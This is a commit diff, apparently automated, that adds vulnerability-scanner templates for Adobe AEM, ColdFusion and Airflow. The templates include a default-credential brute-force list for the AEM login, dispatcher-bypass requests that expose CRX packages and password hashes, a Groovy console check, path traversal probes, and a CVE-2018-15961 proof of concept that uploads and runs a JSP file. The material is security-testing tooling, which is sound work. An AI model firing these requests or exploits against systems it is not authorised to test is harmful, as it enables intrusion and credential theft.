20250326

Author: actions-user

date.txt

@@ -1 +1 @@
-20250325
+20250326

tmp/adobe/adobe-aem-default-credentials.yaml

@@ -0,0 +1,65 @@
+id: adobe-aem-default-credentials
+
+info:
+  name: Adobe AEM Default Credentials
+  author: random-robbie
+  severity: critical
+  tags: aem,default-login,fuzz
+requests:
+
+  - payloads:
+
+      rr_username:
+        - admin
+        - grios
+        - replication-receiver
+        - vgnadmin
+        - [email protected]
+        - [email protected]
+        - [email protected]
+        - [email protected]
+        - [email protected]
+        - [email protected]
+
+      rr_password:
+        - admin
+        - password
+        - replication-receiver
+        - vgnadmin
+        - aparker
+        - jdoe
+        - password
+        - password
+        - password
+        - password
+
+    attack: pitchfork  # Available options: sniper, pitchfork and clusterbomb
+
+    raw:
+      - |
+        POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+        Accept: text/plain, */*; q=0.01
+        Accept-Language: en-US,en;q=0.5
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Content-Length: 67
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/libs/granite/core/content/login.html
+        Connection: close
+
+        _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - login-token
+          - crx.default
+        condition: and

tmp/adobe/adobe-client.yaml

@@ -0,0 +1,23 @@
+id: adobe-client
+
+info:
+  name: Adobe Client ID
+  author: DhiyaneshDK
+  severity: info
+  reference:
+    - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml
+    - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go
+  metadata:
+    verified: true
+  tags: keys,file,adobe,token
+
+file:
+  - extensions:
+      - all
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
+# digest: 490a00463044022007eda94aded10055c992548f92f163ce142cfa63312df87ab1913d55655c84a402205cfb63b7803c40be56e370f98a2541ef20c37455b0b0f136a5c19164ee802429:922c64590222798bb761d5b6d8e72950

tmp/adobe/adobe-coldfusion-detector-error.yaml

@@ -0,0 +1,29 @@
+id: adobe-coldfusion-detector-error
+info:
+  name: Adobe ColdFusion Detector
+  author: philippedelteil
+  severity: info
+  description: With this template we can detect a running ColdFusion instance due to an error page.
+  reference: https://twitter.com/PhilippeDelteil/status/1418622775829348358
+  tags: adobe,coldfusion
+requests:
+  - payloads:
+      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
+    attack: sniper
+    threads: 100
+    raw:
+      - |
+        GET /_something_.cfm HTTP/1.1
+        Host: {{Subdomains}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ColdFusion documentation'
+      - type: status
+        status:
+          - 404

tmp/adobe/adobe-connect.yaml

@@ -0,0 +1,14 @@
+name: adobe-connect
+priority: 3
+nuclei_tags:
+  - []
+fingerprint:
+  - path: /
+    request_method: get
+    request_headers: {}
+    request_data: ''
+    status_code: 0
+    headers: {}
+    keyword:
+      - /common/scripts/showcontent.js
+    favicon_hash: []

tmp/adobe/adobe-experience-manager.yaml

@@ -0,0 +1,14 @@
+name: adobe-experience-manager
+priority: 3
+nuclei_tags:
+ - - aem
+fingerprint:
+ - path: /
+   request_method: get
+   request_headers: {}
+   request_data: ''
+   status_code: 0
+   headers: {}
+   keyword:
+     - tag{background:url(login/clientlib/resources/adobe-logo.png)
+   favicon_hash: []

tmp/adobe/adobe-secret.yaml

@@ -0,0 +1,25 @@
+id: adobe-secret
+
+info:
+  name: Adobe OAuth Client Secret
+  author: DhiyaneshDK
+  severity: info
+  reference:
+    - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/adobe.yml
+    - https://developer.adobe.com/developer-console/docs/guides/authentication/
+    - https://developer.adobe.com/developer-console/docs/guides/authentication/OAuthIntegration/
+    - https://developer.adobe.com/developer-console/docs/guides/authentication/OAuth/
+  metadata:
+    verified: true
+  tags: file,keys,adobe,oauth,token
+
+file:
+  - extensions:
+      - all
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - '(?i)\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)'
+# digest: 4a0a00473045022100fbb2a00c904fe46b3138bc5a79cd5d3e108bf9a7ce64db4d82a47a40b4edfc7e022036f0b1d84e6bbde773bd90b9021e8202465c54346d9f1436af84e622a119114a:922c64590222798bb761d5b6d8e72950

tmp/adobe/aem-crx-list-packages.yaml

@@ -0,0 +1,30 @@
+id: aem-crx-list-packages
+info:
+  name: AEM CRX List All Packages
+  risk: High
+params:
+  - root: '{{.BaseURL}}'
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true
+    headers:
+      - User-Agent: curl/123
+      - Referer: '{{.BaseURL}}'
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("response", "buildCount") && StringSearch("body", "downloadName") && StringSearch("body", "acHandling")
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true
+    headers:
+      - User-Agent: curl/123
+      - Referer: '{{.BaseURL}}'
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("response", "buildCount") && StringSearch("body", "downloadName") && StringSearch("body", "acHandling")
+references:
+  - link: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
+  - author: '0xd0ff9 & j3ssie'

tmp/adobe/aem-fuzz.yaml

@@ -0,0 +1,33 @@
+id: aem-fuzz
+info:
+  author: MRiambatman
+  name: AEM FUZZ
+  severity: medium
+  reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
+  tags: aem
+requests:
+  - raw:
+      - "GET /§header§ HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 \n"
+    payloads:
+      header: helpers/payloads/aem2.txt
+    attack: clusterbomb
+    redirects: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 500
+          - 301
+          - 400
+          - 302
+      - type: word
+        words:
+          - 'jcr:createdBy'
+          - 'Web console'
+          - 'authenticated=true'
+          - 'userid='
+          - 'jcr:'
+          - 'AccessKeyId:'
+          - 'java heap space'
+        condition: and

tmp/adobe/aem-groovyconsole-152.yaml

@@ -0,0 +1,32 @@
+id: aem-groovyconsole
+info:
+  name: AEM Groovy console enabled
+  author: Dheerajmadhukar
+  severity: critical
+  description: Groovy console is exposed, RCE is possible.
+  reference: https://hackerone.com/reports/672243
+  tags: aem
+requests:
+  - payloads:
+      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
+    attack: sniper
+    threads: 100
+    raw:
+      - |
+        GET /groovyconsole HTTP/1.1
+        Host: {{Subdomains}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Language: en-US,en;q=0.9,hi;q=0.8
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Groovy Console</title>"
+          - "Run Script"
+          - "Groovy Web Console"
+        part: body
+        condition: and
+      - type: status
+        status:
+          - 200

tmp/adobe/aem-hash-querybuilder-158.yaml

@@ -0,0 +1,33 @@
+id: aem-hash-querybuilder
+info:
+  author: DhiyaneshDk
+  name: Query hashed password via QueryBuilder Servlet
+  severity: medium
+  reference: https://twitter.com/AEMSecurity/status/1372392101829349376
+  tags: aem
+requests:
+  - payloads:
+      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
+    attack: sniper
+    threads: 100
+    raw:
+      - |
+        GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
+        Host: {{Subdomains}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+        Cache-Control: max-age=0
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - '"success":true'
+          - 'rep:password'
+        condition: and

tmp/adobe/aem-workflow.yaml

@@ -0,0 +1,11 @@
+id: aem-workflow
+
+info:
+  name: Adobe Experience Manager Security Checks
+  author: dhiyaneshDK
+  description: A simple workflow that runs all Adobe Experience Manager related nuclei templates on a given target.
+
+workflows:
+  - template: technologies/aem-detect.yaml
+    subtemplates:
+      - tags: aem

tmp/adobe/aem.yaml

@@ -0,0 +1,13 @@
+template:
+  name: aem-traversal
+  severity: medium
+  author: "zoidsec"
+  description: AEM CRX Path Traversal
+request:
+  payloads:
+    - '/content/..;/crx/packmgr/index.jsp'
+  paths: true
+response:
+  statusCode: 200
+  patterns:
+    - 'CRX Package Manager'

tmp/adobe/yaml-poc-adobe-coldfusion-logical-CVE-2018-15961.yml

@@ -0,0 +1,36 @@
+name: poc-yaml-adobe-coldfusion-cve-2018-15961
+binding: e8aa3202-5b1e-4446-94c3-635ba6ac5ffe
+manual: true
+detail:
+    author: sharecast
+    links:
+        - https://nosec.org/home/detail/1958.html
+    vulnerability:
+        id: CT-117999
+        level: critical
+    warning: 该脚本会上传文件产生一个临时的无害文件，同时能够执行自删除逻辑，但是可能删除不成功
+transport: http
+set:
+    r1: randomInt(40000, 44800)
+    r2: randomInt(40000, 44800)
+    rboundary: randomLowercase(8)
+    randname: randomLowercase(6)
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
+            headers:
+                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
+            body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"path\"\r\n\npath\r\n------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randname}}.jsp\"\r\nContent-Type: image/jpeg\r\n\r\n<%out.print({{r1}} * {{r2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
+            follow_redirects: false
+        expression: response.status == 200
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randname}}.jsp
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+expression: r0() && r1()

tmp/airflow/airflow-configuration-exposure-229.yaml

@@ -0,0 +1,22 @@
+id: airflow-configuration-exposure
+info:
+  name: Apache Airflow Configuration Exposure
+  author: pdteam
+  severity: medium
+  tags: exposure,config,airflow,apache
+requests:
+  - payloads:
+      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
+    attack: sniper
+    threads: 100
+    raw:
+      - |
+        GET /airflow.cfg HTTP/1.1
+        Host: {{Subdomains}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    matchers:
+      - type: word
+        words:
+          - '[core]'
+          - '[api]'
+        condition: and